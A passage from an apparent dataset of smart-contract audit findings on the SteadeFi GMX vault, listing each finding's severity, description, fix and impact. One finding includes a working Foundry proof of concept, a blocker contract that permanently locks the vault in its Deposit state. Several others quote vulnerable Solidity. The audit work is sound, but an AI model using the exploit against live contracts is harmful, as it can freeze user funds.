execution fees), then this function will invoke `GMXDeposit.deposit` with a `msg.value` equal to the amount that the user wants to deposit + execution fees.\\nIn GMXDeposit.deposit: various checks are made to ensure the sanity of the deposit parameters and the eligibility of the user to deposit, and to calculate the required `tokenA` & `tokenB` needed to deposit in the `GMX` protocol, then the sent native tokens are deposited in the WNT contract and an equivalent amount of WNT is transferred to the vault.\\nAnd before the call is made to the `GMXManager.addLiquidity` (where a call is going to be made to the `GMX.exchangeRouter` contract) to add liquidity; the status of the vault is checked if it's `Open`, if yes; then the status of the vault is set to `Deposit` so that no more deposits or withdrawals can be made (the vault will be blocked until the operation succeeds).\\nSo if the operation succeeds in the `GMX` exchange router; the vault callback will invoke `processDeposit` function to finish the process and update the vault status to `Open`.\\nAnd if the operation of adding liquidity is cancelled by the `GMX` exchange router (3rd party); the vault callback will invoke `processDepositCancellation` function to rollback the process by repaying the lendingVaults debts and paying back the native tokens sent by the user, then update the vault status to `Open` so that the vault is open again for deposits and withdrawals.\\nUsually the deposit (liquidity addition to `GMX` protocol) fails if the user sets a very high slippage parameter when making a deposit (dp.slippage).\\nHow can this be exploited to block the vault? 
Imagine the following scenario:\\nIf a malicious user deploys an unpayable contract (doesn't receive native tokens) and makes a call to the `GMXVault.depositNative` function with a very high slippage to ensure that the deposit will be cancelled by the GMX exchange router.\\nSo when the deposit is cancelled and the vault callback `processDepositCancellation` function is invoked by the router; it will revert as it will try to send back the native tokens to the user who tried to make the deposit (which is the unpayable contract in our case).\\nAnd the status of the vault will be stuck in the `Deposit` state; so no more deposits or withdrawals can be made and the vault will be disabled.\\nThe same scenario will happen if the user got blocklisted later by the deposited token contract (tokenA or tokenB), but the probability of this happening is very low as the GMX exchange router will add liquidity in two transactions with a small time separation between them!\\nCode Instances:\\nGMXVault.depositNative\\n```\\n function depositNative(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, true);\\n }\\n```\\n\\nGMXDeposit.deposit /L88\\n```\\n_dc.user = payable(msg.sender);\\n```\\n\\nGMXDeposit.processDepositCancellation /L209-210\\n```\\n(bool success, ) = self.depositCache.user.call{value: address(this).balance}(\"\");\\n require(success, \"Transfer failed.\");\\n```\\n\\nFoundry PoC:\\nA `BlockerContract.sol` is added to mimic the behaviour of an unpayable contract. 
add the following contract to the `2023-10-SteadeFi/test/gmx/local/BlockerContract.sol` directory:\\n`// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\n\\nimport {GMXTypes} from \"../../../contracts/strategy/gmx/GMXTypes.sol\";\\nimport {GMXVault} from \"../../../contracts/strategy/gmx/GMXVault.sol\";\\n\\ncontract BlockerContract {\\n constructor() payable {}\\n\\n function callVault(\\n address payable _vaultAddress,\\n GMXTypes.DepositParams memory dp\\n ) external {\\n GMXVault targetVault = GMXVault(_vaultAddress);\\n targetVault.depositNative{value: address(this).balance}(dp);\\n }\\n}`\\n`test_processDepositCancelWillBlockVault` test is added to to the `2023-10-SteadeFi/test/gmx/local/GMXDepositTest.sol` directory; where the blockerContract is deployed with some native tokens to cover deposit amount + execution fees, then this contract calls the `depositNative` via `BlockerContract.callVault`, where the exchange router tries to cancel the deposit but it will not be able as the BlockerContract can't receive back deposited native tokens, and the vault will be blocked.\\nadd this import statement and test to the `GMXDepositTest.sol` file :\\n`import {BlockerContract} from \"./BlockerContract.sol\";`\\n` function test_processDepositCancelWillBlockVault() external {\\n //1. deploy the blockerContract contract with a msg.value=deposit amount + execution fees:\\n uint256 depositAmount = 1 ether;\\n\\n BlockerContract blockerContract = new BlockerContract{\\n value: depositAmount + EXECUTION_FEE\\n }();\\n\\n //check balance before deposit:\\n uint256 blockerContractEthBalance = address(blockerContract).balance;\\n assertEq(depositAmount + EXECUTION_FEE, blockerContractEthBalance);\\n\\n //2. 
preparing deposit params to call \"depositNative\" via the blockerContract:\\n depositParams.token = address(WETH);\\n depositParams.amt = depositAmount;\\n depositParams.minSharesAmt = 0;\\n depositParams.slippage = SLIPPAGE;\\n depositParams.executionFee = EXECUTION_FEE;\\n\\n blockerContract.callVault(payable(address(vault)), depositParams);\\n\\n // vault status is \"Deposit\":\\n assertEq(uint256(vault.store().status), 1);\\n\\n //3. the blockerContract tries to cancel the deposit, but it will not be able to do beacuse it's unpayable contract:\\n vm.expectRevert();\\n mockExchangeRouter.cancelDeposit(\\n address(WETH),\\n address(USDC),\\n address(vault),\\n address(callback)\\n );\\n\\n // vault status will be stuck at \"Deposit\":\\n assertEq(uint256(vault.store().status), 1);\\n\\n // check balance after cancelling the deposit, where it will be less than the original as no refund has been paid (the blockerContract is unpayable):\\n assertLt(address(blockerContract).balance, blockerContractEthBalance);\\n }`\\nTest result:\\n`$ forge test --mt `test_processDepositCancelWillBlockVault`\\nRunning 1 test for test/gmx/local/GMXDepositTest.sol:GMXDepositTest\\n[PASS] test_processDepositCancelWillBlockVault() (gas: 1419036)\\nTest result: ok. 
1 passed; 0 failed; 0 skipped; finished in 24.62ms\\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)`чAdd a mechanism to enable the user from redeeming his cancelled deposits (pulling) instead of sending it back to him (pushing).чThe vault will be blocked as it will be stuck in the `Deposit` state; so no more deposits or withdrawals can be made.ч```\\n function depositNative(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, true);\\n }\\n```\\n -Emergency Closed Vault Can Be Paused Then ResumeчmediumчThe `emergencyClose` function is intended to be a final measure to repay all debts and shut down the vault permanently, as indicated by the function's documentation. This action should be irreversible to ensure the finality and security of the vault's emergency closure process.\\n```\\nFile: GMXVaul.sol\\n /**\\n * @notice Repays all debt owed by vault and shut down vault, allowing emergency withdrawals\\n * @dev Note that this is a one-way irreversible action\\n * @dev Should be called by approved Owner (Timelock + MultiSig)\\n * @param deadline Timestamp of swap deadline\\n */\\n function emergencyClose(uint256 deadline) external onlyOwner {\\n GMXEmergency.emergencyClose(_store, deadline);\\n }\\n```\\n\\nHowever, a pathway exists to effectively reopen a vault after it has been closed using `emergencyClose` by invoking the `emergencyPause` and `emergencyResume` functions. 
These functions alter the vault's status, allowing for the resumption of operations which contradicts the intended irreversible nature of an emergency close.\\n```\\nFile: GMXEmergency.sol\\n function emergencyPause(\\n GMXTypes.Store storage self\\n ) external {\\n self.refundee = payable(msg.sender);\\n\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n\\n // Remove all of the vault's LP tokens\\n _rlp.lpAmt = self.lpToken.balanceOf(address(this));\\n _rlp.executionFee = msg.value;\\n\\n\\n GMXManager.removeLiquidity(\\n self,\\n _rlp\\n );\\n\\n\\n self.status = GMXTypes.Status.Paused;\\n\\n\\n emit EmergencyPause();\\n }\\n```\\n\\n```\\nFile: GMXEmergency.sol\\n function emergencyResume(\\n GMXTypes.Store storage self\\n ) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n\\n self.refundee = payable(msg.sender);\\n\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.executionFee = msg.value;\\n\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n\\nAdd this to GMXEmergencyTest.t.sol and test with forge test --mt test_close_then_pause -vv:\\n```\\n function test_close_then_pause() external {\\n // Pause the vault\\n vault.emergencyPause();\\n console2.log(\"vault status\", uint256(vault.store().status));\\n\\n // Close the vault\\n vault.emergencyClose(deadline);\\n console2.log(\"vault status\", uint256(vault.store().status));\\n\\n // Pause the vault again\\n vault.emergencyPause();\\n console2.log(\"vault status\", uint256(vault.store().status));\\n assertEq(uint256(vault.store().status), 10, \"vault status not set to paused\");\\n\\n // Resume the vault\\n vault.emergencyResume();\\n console2.log(\"vault status\", uint256(vault.store().status));\\n }\\n```\\nчImplement a permanent state or flag within the vault's storage to irrevocably mark the vault as 
closed after `emergencyClose` is called. This flag should prevent any further state-altering operations.\\nModify the `emergencyPause` and `emergencyResume` functions to check for this permanent closure flag and revert if the vault has been emergency closed.чThe impact of this finding is significant, as it undermines the trust model of the emergency close process. Users and stakeholders expect that once a vault is closed in an emergency, it will remain closed as a protective measure. The ability to resume operations after an emergency closure could expose the vault to additional risks and potentially be exploited by malicious actors, especially if the original closure was due to a security threat.ч```\\nFile: GMXVaul.sol\\n /**\\n * @notice Repays all debt owed by vault and shut down vault, allowing emergency withdrawals\\n * @dev Note that this is a one-way irreversible action\\n * @dev Should be called by approved Owner (Timelock + MultiSig)\\n * @param deadline Timestamp of swap deadline\\n */\\n function emergencyClose(uint256 deadline) external onlyOwner {\\n GMXEmergency.emergencyClose(_store, deadline);\\n }\\n```\\n -The transfer of ERC-20 tokens with blacklist functionality in process functions can lead to stuck vaultsчmediumчInside a few process functions are ERC-20 tokens transfered which could potentially have a blacklist functionality. This can lead to a DoS of the strategy vault. If for example, a blacklisted user withdraws funds.\\nSome ERC-20 tokens like for example USDC (which is used by the system) have the functionality to blacklist specific addresses, so that they are no longer able to transfer and receive tokens. Sending funds to these addresses will lead to a revert. A few of the process functions inside the deposit and withdraw contracts transfer ERC-20 tokens to addresses which could potentially be blacklisted. 
The system is not in an Open state when a keeper bot interacts with such a process function, and if the call to such a function reverts, the status can not be updated back to Open. Therefore, it will remain in the given status and a DoS for all users occurs. The only possibility that DoS stops would be when the user is no longer blacklisted, which can potentially last forever.\\nThe attack flow (could be accidental) would for example look like this:\\nUSDC Blacklisted user calls withdraw with the wish to withdraw USDC\\nwithdraw function passes and status is updated to GMXTypes.Status.Withdraw\\nKeeper calls the processWithdraw function\\nTransferring USDC tokens to blacklisted user reverts\\nTherefore vault is stuck inside GMXTypes.Status.Withdraw status and all users experience a DoS\\nHere are the code snippets of these dangerous transfers inside process functions:\\n```\\nfunction processDepositCancellation(\\n GMXTypes.Store storage self\\n) external {\\n GMXChecks.beforeProcessDepositCancellationChecks(self);\\n // rest of code\\n // Transfer requested withdraw asset to user\\n IERC20(self.depositCache.depositParams.token).safeTransfer(\\n self.depositCache.user,\\n self.depositCache.depositParams.amt\\n );\\n // rest of code\\n self.status = GMXTypes.Status.Open;\\n\\n emit DepositCancelled(self.depositCache.user);\\n}\\n```\\n\\n```\\nfunction processDepositFailureLiquidityWithdrawal(\\n GMXTypes.Store storage self\\n) public {\\n GMXChecks.beforeProcessAfterDepositFailureLiquidityWithdrawal(self);\\n // rest of code\\n // Refund user the rest of the remaining withdrawn LP assets\\n // Will be in tokenA/tokenB only; so if user deposited LP tokens\\n // they will still be refunded in tokenA/tokenB\\n self.tokenA.safeTransfer(self.depositCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.depositCache.user, self.tokenB.balanceOf(address(this)));\\n // rest of code\\n self.status = 
GMXTypes.Status.Open;\\n}\\n```\\n\\n```\\nfunction processWithdraw(\\n GMXTypes.Store storage self\\n) external {\\n GMXChecks.beforeProcessWithdrawChecks(self);\\n\\n try GMXProcessWithdraw.processWithdraw(self) {\\n if (self.withdrawCache.withdrawParams.token == address(self.WNT)) {\\n // rest of code\\n } else {\\n // Transfer requested withdraw asset to user\\n IERC20(self.withdrawCache.withdrawParams.token).safeTransfer(\\n self.withdrawCache.user,\\n self.withdrawCache.tokensToUser\\n );\\n }\\n\\n // Transfer any remaining tokenA/B that was unused (due to slippage) to user as well\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n self.tokenB.safeTransfer(self.withdrawCache.user, self.tokenB.balanceOf(address(this)));\\n \\n // rest of code\\n\\n self.status = GMXTypes.Status.Open;\\n }\\n // rest of code\\n}\\n```\\nчInstead of transferring the ERC-20 tokens directly to a user in the process functions, use a two-step process instead. For example, create another contract whose only purpose is to hold assets and store the information about which address is allowed to withdraw how many of the specified tokens. In the process functions, send the funds to this new contract along with this information instead. So if a user has been blacklisted, the DoS only exists for that specific user and for the rest of the users the system continues to function normally.чDoS of the entire strategy vault, as the status can no longer be updated to Open until the user is no longer blacklisted. 
This can potentially take forever and forces the owners to take emergency action.ч```\\nfunction processDepositCancellation(\\n GMXTypes.Store storage self\\n) external {\\n GMXChecks.beforeProcessDepositCancellationChecks(self);\\n // rest of code\\n // Transfer requested withdraw asset to user\\n IERC20(self.depositCache.depositParams.token).safeTransfer(\\n self.depositCache.user,\\n self.depositCache.depositParams.amt\\n );\\n // rest of code\\n self.status = GMXTypes.Status.Open;\\n\\n emit DepositCancelled(self.depositCache.user);\\n}\\n```\\n -Rebalance may occur due to wrong requirements checkчlowчBefore a rebalance can occur, checks are implemented to ensure that `delta` and `debtRatio` remain within their specified limits. However, it's important to note that the check in `GMXChecks::beforeRebalanceChecks` ignores the scenario where these values are equal to any of their limits.\\nIn the current implementation of the `GMXRebalance::rebalanceAdd` function, it first calculates the current values of `debtRatio` and `delta` before making any changes. Subsequently, the `beforeRebalanceChecks` function, checks if these values meet the requirements for a rebalance to occur. 
These requirements now dictate that both `debtRatio` and `delta` must be either ≥ to the `UpperLimit`, or ≤ to the `LowerLimit` for a rebalance to take place.\\n```\\nfunction beforeRebalanceChecks(\\n GMXTypes.Store storage self,\\n GMXTypes.RebalanceType rebalanceType\\n) external view {\\n if (\\n self.status != GMXTypes.Status.Open &&\\n self.status != GMXTypes.Status.Rebalance_Open\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n\\n // Check that rebalance type is Delta or Debt\\n // And then check that rebalance conditions are met\\n // Note that Delta rebalancing requires vault's delta strategy to be Neutral as well\\n if (rebalanceType == GMXTypes.RebalanceType.Delta && self.delta == GMXTypes.Delta.Neutral) {\\n if (\\n self.rebalanceCache.healthParams.deltaBefore < self.deltaUpperLimit &&\\n self.rebalanceCache.healthParams.deltaBefore > self.deltaLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else if (rebalanceType == GMXTypes.RebalanceType.Debt) {\\n if (\\n self.rebalanceCache.healthParams.debtRatioBefore < self.debtRatioUpperLimit &&\\n self.rebalanceCache.healthParams.debtRatioBefore > self.debtRatioLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else {\\n revert Errors.InvalidRebalanceParameters();\\n }\\n}\\n```\\n\\nSuppose a rebalance is successful. In the `afterRebalanceChecks` section, the code verifies whether both `delta` and `debtRatio` are greater than the `UpperLimit` or less than the `LowerLimit`. This confirmation implies that these limits are indeed inclusive, meaning that the correct interpretation of these limits should be that `LowerLimit` ≤ actualValue ≤ `UpperLimit`. On the other hand, this also indicates that for a rebalancing to occur, the values of `deltaBefore` and `debtRatioBefore` need to be outside their limits, i.e., `delta` should be greater than `Upper` or less than `Lower`. 
However, in the current implementation, if these values are equal to the limit, a rebalance may still occur, which violates the consistency of the `afterRebalanceChecks` function, thus indicating that these limits are inclusive. Consequently, a value equal to the limit needs to be treated as valid and not be able to trigger a rebalance.\\n```\\nfunction afterRebalanceChecks(\\n GMXTypes.Store storage self\\n) external view {\\n // Guards: check that delta is within limits for Neutral strategy\\n if (self.delta == GMXTypes.Delta.Neutral) {\\n int256 _delta = GMXReader.delta(self);\\n\\n if (\\n _delta > self.deltaUpperLimit ||\\n _delta < self.deltaLowerLimit\\n ) revert Errors.InvalidDelta();\\n }\\n\\n // Guards: check that debt is within limits for Long/Neutral strategy\\n uint256 _debtRatio = GMXReader.debtRatio(self);\\n\\n if (\\n _debtRatio > self.debtRatioUpperLimit ||\\n _debtRatio < self.debtRatioLowerLimit\\n ) revert Errors.InvalidDebtRatio();\\n}\\n```\\n\\nImagine the case when `delta` or `debtRatio` is equal to any of its limits; a rebalance will occur. However, on the other hand, these values are valid because they are inclusively within the limits.чRebalance may occur due to wrong requirements check\\nConsider a strict check to determine if `delta` or `debtRatio` is strictly within its limits, including scenarios where they are equal to any of its limits. 
In such cases, the code should ensure that a rebalance does not occur when these values are precisely at the limit.\\n```\\nfunction beforeRebalanceChecks(\\n GMXTypes.Store storage self,\\n GMXTypes.RebalanceType rebalanceType\\n ) external view {\\n if (\\n self.status != GMXTypes.Status.Open &&\\n self.status != GMXTypes.Status.Rebalance_Open\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n\\n // Check that rebalance type is Delta or Debt\\n // And then check that rebalance conditions are met\\n // Note that Delta rebalancing requires vault's delta strategy to be Neutral as well\\n if (rebalanceType == GMXTypes.RebalanceType.Delta && self.delta == GMXTypes.Delta.Neutral) {\\n if (\\n// Remove the line below\\n self.rebalanceCache.healthParams.deltaBefore < self.deltaUpperLimit &&\\n// Remove the line below\\n self.rebalanceCache.healthParams.deltaBefore > self.deltaLowerLimit\\n// Add the line below\\n self.rebalanceCache.healthParams.deltaBefore <= self.deltaUpperLimit &&\\n// Add the line below\\n self.rebalanceCache.healthParams.deltaBefore >= self.deltaLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else if (rebalanceType == GMXTypes.RebalanceType.Debt) {\\n if (\\n// Remove the line below\\n self.rebalanceCache.healthParams.debtRatioBefore < self.debtRatioUpperLimit &&\\n// Remove the line below\\n self.rebalanceCache.healthParams.debtRatioBefore > self.debtRatioLowerLimit\\n// Add the line below\\n self.rebalanceCache.healthParams.debtRatioBefore <= self.debtRatioUpperLimit &&\\n// Add the line below\\n self.rebalanceCache.healthParams.debtRatioBefore >= self.debtRatioLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else {\\n revert Errors.InvalidRebalanceParameters();\\n }\\n }\\n```\\nчIn such a scenario, the system might incorrectly trigger a rebalance of the vault, even when `delta` or `debtRatio` is precisely within the established limits, thus potentially causing unintended rebalancing 
actions.ч```\\nfunction beforeRebalanceChecks(\\n GMXTypes.Store storage self,\\n GMXTypes.RebalanceType rebalanceType\\n) external view {\\n if (\\n self.status != GMXTypes.Status.Open &&\\n self.status != GMXTypes.Status.Rebalance_Open\\n ) revert Errors.NotAllowedInCurrentVaultStatus();\\n\\n // Check that rebalance type is Delta or Debt\\n // And then check that rebalance conditions are met\\n // Note that Delta rebalancing requires vault's delta strategy to be Neutral as well\\n if (rebalanceType == GMXTypes.RebalanceType.Delta && self.delta == GMXTypes.Delta.Neutral) {\\n if (\\n self.rebalanceCache.healthParams.deltaBefore < self.deltaUpperLimit &&\\n self.rebalanceCache.healthParams.deltaBefore > self.deltaLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else if (rebalanceType == GMXTypes.RebalanceType.Debt) {\\n if (\\n self.rebalanceCache.healthParams.debtRatioBefore < self.debtRatioUpperLimit &&\\n self.rebalanceCache.healthParams.debtRatioBefore > self.debtRatioLowerLimit\\n ) revert Errors.InvalidRebalancePreConditions();\\n } else {\\n revert Errors.InvalidRebalanceParameters();\\n }\\n}\\n```\\n -Wrong errors are used for revertsчlowчThere are checks that revert with wrong errors\\nReverts:\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXChecks.sol#L68-L69\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXChecks.sol#L74-L75\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXChecks.sol#L351-L352\\n```\\nFile: contracts/strategy/gmx/GMXChecks.sol\\n\\n// Should be Errors.EmptyDepositAmount\\nif (self.depositCache.depositParams.amt == 0)\\n revert Errors.InsufficientDepositAmount();\\n\\n// Should be Errors.EmptyDepositAmount\\nif (depositValue == 0)\\n revert Errors.InsufficientDepositAmount();\\n\\n// Should be 
Errors.EmptyDepositAmount\\nif (self.compoundCache.depositValue == 0)\\n revert Errors.InsufficientDepositAmount();\\n```\\nчWrong errors are used for reverts\\nConsider using `Errors.EmptyDepositAmount` for the provided cases.чThis can lead to user confusion as they won't receive the accurate revert reason.ч```\\nFile: contracts/strategy/gmx/GMXChecks.sol\\n\\n// Should be Errors.EmptyDepositAmount\\nif (self.depositCache.depositParams.amt == 0)\\n revert Errors.InsufficientDepositAmount();\\n\\n// Should be Errors.EmptyDepositAmount\\nif (depositValue == 0)\\n revert Errors.InsufficientDepositAmount();\\n\\n// Should be Errors.EmptyDepositAmount\\nif (self.compoundCache.depositValue == 0)\\n revert Errors.InsufficientDepositAmount();\\n```\\n -Transfer Limit of UNI Tokens May Lead to a DoS and Token Loss RiskчlowчUsers who accumulate more than 2^96 UNI tokens may lose their tokens because transfers above that will always revert.\\nThe UNI token contract imposes a transfer limit, restricting the maximum amount of tokens that can be transferred in a single transaction to 2^96 UNI tokens. Any transfer exceeding this threshold will trigger a transaction revert. 
The contract relies on the `balanceOf` function to verify the sender's token balance before proceeding with a transfer.\\n```\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n```\\n\\nsuch a transfer will always revert for balances above 2^96 UNI tokens\\nhttps://github.com/d-xo/weird-erc20#revert-on-large-approvals--transfersчTransfer Limit of UNI Tokens May Lead to a DoS and Token Loss Risk\\nContracts should always check the amount of UNI being transferred before processing the transaction.чUsers who accumulate more than 2^96 UNI tokens may lose their tokens due to a DOS revert when attempting to withdraw their token balance.ч```\\n self.tokenA.safeTransfer(self.withdrawCache.user, self.tokenA.balanceOf(address(this)));\\n```\\n -`emergencyClose()` may fail to repay any debtчmediumчthe `emergencyClose()` function may become ineffective, preventing the contract from repaying any outstanding debt, leading to potential financial losses.\\nWhen the contract is paused, all the liquidity from GMX is withdrawn (in term of `tokenA` and tokenB).\\nThe `emergencyClose()` function is called after the contract is paused due some reasons, possibly when the strategy incurs bad debts or when the contract gets hacked, High volatility, and so on...\\nThis function is responsible for repaying all the amounts of `tokenA` and `tokenB` borrowed from the `lendingVault` contract. It then sets the contract's status to `closed`. After that, users who hold `svToken` shares can withdraw the remaining assets from the contract.\\nThe issue with this function lies in its assumptions, which are not accurate. 
It assumes that the withdrawn amounts from GMX are always sufficient to cover the whole debt.\\n```\\n function emergencyClose(GMXTypes.Store storage self, uint256 deadline) external {\\n // Revert if the status is Paused.\\n GMXChecks.beforeEmergencyCloseChecks(self);\\n\\n // Repay all borrowed assets; 1e18 == 100% shareRatio to repay\\n GMXTypes.RepayParams memory _rp;\\n (_rp.repayTokenAAmt, _rp.repayTokenBAmt) = GMXManager.calcRepay(self, 1e18);\\n\\n (bool _swapNeeded, address _tokenFrom, address _tokenTo, uint256 _tokenToAmt) =\\n GMXManager.calcSwapForRepay(self, _rp);\\n\\n if (_swapNeeded) {\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = _tokenFrom;\\n _sp.tokenOut = _tokenTo;\\n _sp.amountIn = IERC20(_tokenFrom).balanceOf(address(this));\\n _sp.amountOut = _tokenToAmt;\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = deadline;\\n\\n GMXManager.swapTokensForExactTokens(self, _sp);\\n }\\n GMXManager.repay(self, _rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n\\n self.status = GMXTypes.Status.Closed;\\n\\n emit EmergencyClose(_rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n }\\n }\\n```\\n\\nPlease note that `_rp.repayTokenAAmt` and `_rp.repayTokenBAmt` represent the entire debt, and these values remain the same even if a swap is needed.\\nThe function checks if a swap is needed to cover its debt, and here's how it determines whether a swap is required:\\n```\\n function calcSwapForRepay(GMXTypes.Store storage self, GMXTypes.RepayParams memory rp)\\n external\\n view\\n returns (bool, address, address, uint256)\\n {\\n address _tokenFrom;\\n address _tokenTo;\\n uint256 _tokenToAmt;\\n if (rp.repayTokenAAmt > self.tokenA.balanceOf(address(this))) {\\n // If more tokenA is needed for repayment\\n _tokenToAmt = rp.repayTokenAAmt - self.tokenA.balanceOf(address(this));\\n _tokenFrom = address(self.tokenB);\\n _tokenTo = address(self.tokenA);\\n\\n return (true, _tokenFrom, _tokenTo, _tokenToAmt);\\n } else if (rp.repayTokenBAmt > 
self.tokenB.balanceOf(address(this))) {\\n // If more tokenB is needed for repayment\\n _tokenToAmt = rp.repayTokenBAmt - self.tokenB.balanceOf(address(this));\\n _tokenFrom = address(self.tokenA);\\n _tokenTo = address(self.tokenB);\\n\\n return (true, _tokenFrom, _tokenTo, _tokenToAmt);\\n } else {\\n // If there is enough to repay both tokens\\n return (false, address(0), address(0), 0);\\n }\\n }\\n```\\n\\nIn plain English, this function in this case assumes: if the contract's balance of one of the tokens (e.g., tokenA) is insufficient to cover `tokenA` debt, it means that the contract balance of the other token (tokenB) should be greater than the debt of `tokenB`, and the value of the remaining balance of `tokenB` after paying off the `tokenB` debt should be equal or greater than the required value to cover the debt of `tokenA`\\nThe two main issues with this assumption are:\\nIf the contract balance of `tokenFrom` is not enough to be swapped for `_tokenToAmt` of `tokenTo`, the swap will revert, causing the function to revert each time it is called when the balance of `tokenFrom` is insufficient.(in most cases in delta long strategy since it's only borrow one token), This is highly likely since emergency closures occur when something detrimental has happened, (such as bad debts).\\nThe second issue arises when the balance of tokenFrom(EX: tokenA) becomes less than `_rp.repayTokenAAmt` after a swap. In this case, the `repay` call will revert when the `lendingVault` contract attempts to `transferFrom` the strategy contract for an amount greater than its balance. 
ex :\\n`tokenA` balance = 100, debtA = 80.\\ntokenB balance = 50 , debtB = 70.\\nafter swap `tokenA` for 20 tokenB .\\n`tokenA` balance = 75 , debtA = 80 : in this case `repay` will keep revert .\\nso if the contract accumulates bad debts(in value), the `emergencyClose()` function will always revert, preventing any debt repayment.\\nAnother critical factor to consider is the time between the `pause` action and the emergency `close` action. During periods of high volatility, the `pause` action temporarily halts the contract, but the prices of the two assets may continue to decline. The emergency `close` function can only be triggered by the owner, who operates a time-lock wallet. In the time between the `pause` and `close` actions, the prices may drop significantly and this condition will met since the `swap` is needed in almost all cases.чthe debt need to be repayed in the `pause` action. and in case of `resume` just re-borrow again.ч`emergencyClose()` function will consistently fail to repay any debt.\\nlenders may lose all their fundsч```\\n function emergencyClose(GMXTypes.Store storage self, uint256 deadline) external {\\n // Revert if the status is Paused.\\n GMXChecks.beforeEmergencyCloseChecks(self);\\n\\n // Repay all borrowed assets; 1e18 == 100% shareRatio to repay\\n GMXTypes.RepayParams memory _rp;\\n (_rp.repayTokenAAmt, _rp.repayTokenBAmt) = GMXManager.calcRepay(self, 1e18);\\n\\n (bool _swapNeeded, address _tokenFrom, address _tokenTo, uint256 _tokenToAmt) =\\n GMXManager.calcSwapForRepay(self, _rp);\\n\\n if (_swapNeeded) {\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = _tokenFrom;\\n _sp.tokenOut = _tokenTo;\\n _sp.amountIn = IERC20(_tokenFrom).balanceOf(address(this));\\n _sp.amountOut = _tokenToAmt;\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = deadline;\\n\\n GMXManager.swapTokensForExactTokens(self, _sp);\\n }\\n GMXManager.repay(self, _rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n\\n self.status = GMXTypes.Status.Closed;\\n\\n emit 
EmergencyClose(_rp.repayTokenAAmt, _rp.repayTokenBAmt);\\n }\\n }\\n```\\n -Missing minimum token amounts in the emergency contract functions allows MEV bots to take advantage of the protocols emergency situationчmediumчWhen an emergency situation arises and the protocol pauses or resumes the operation of the vault. All funds of the vault are removed from GMX or added back to GMX without any protection against slippage. This allows MEV bots to take advantage of the protocol's emergency situation and make huge profits with it.\\nWhen an emergency situation arises the protocol owners can call the emergencyPause function to remove all the liquidity from GMX:\\n```\\nfunction emergencyPause(\\n GMXTypes.Store storage self\\n) external {\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // Remove all of the vault's LP tokens\\n _rlp.lpAmt = self.lpToken.balanceOf(address(this));\\n _rlp.executionFee = msg.value;\\n\\n GMXManager.removeLiquidity(\\n self,\\n _rlp\\n );\\n\\n self.status = GMXTypes.Status.Paused;\\n\\n emit EmergencyPause();\\n}\\n```\\n\\nBut the minimum tokens amount to get back when removing liquidity is not provided to the RemoveLiquidityParams:\\n```\\nstruct RemoveLiquidityParams {\\n // Amount of lpToken to remove liquidity\\n uint256 lpAmt;\\n // Array of market token in array to swap tokenA to other token in market\\n address[] tokenASwapPath;\\n // Array of market token in array to swap tokenB to other token in market\\n address[] tokenBSwapPath;\\n // Minimum amount of tokenA to receive in token decimals\\n uint256 minTokenAAmt;\\n // Minimum amount of tokenB to receive in token decimals\\n uint256 minTokenBAmt;\\n // Execution fee sent to GMX for removing liquidity\\n uint256 executionFee;\\n}\\n```\\n\\nAs it is not set, the default value 0 (uint256) is used. 
Therefore, up to 100% slippage is allowed.\\nThe same parameters are also missing when normal operation resumes:\\n```\\nfunction emergencyResume(\\n GMXTypes.Store storage self\\n) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n self.refundee = payable(msg.sender);\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.executionFee = msg.value;\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n}\\n```\\n\\nTherefore, MEV bots could take advantage of the protocol's emergency situation and as these trades include all funds of the vault it could lead to a big loss.\\nIgnoring slippage when pausing could be a design choice of the protocol to avoid the possibility of a revert and pause the system as quickly as possible. However, this argument does not apply during the resume.чImplement a custom minMarketTokens parameter, but do not implement the usual slippage calculation, as this could potentially lead to new critical vulnerabilities. If for example the reason for this emergency situation is a no longer supported chainlink feed, which will lead to reverts and therefore also to DoS of the emergency close / withdraw flow.чBig loss of funds as all 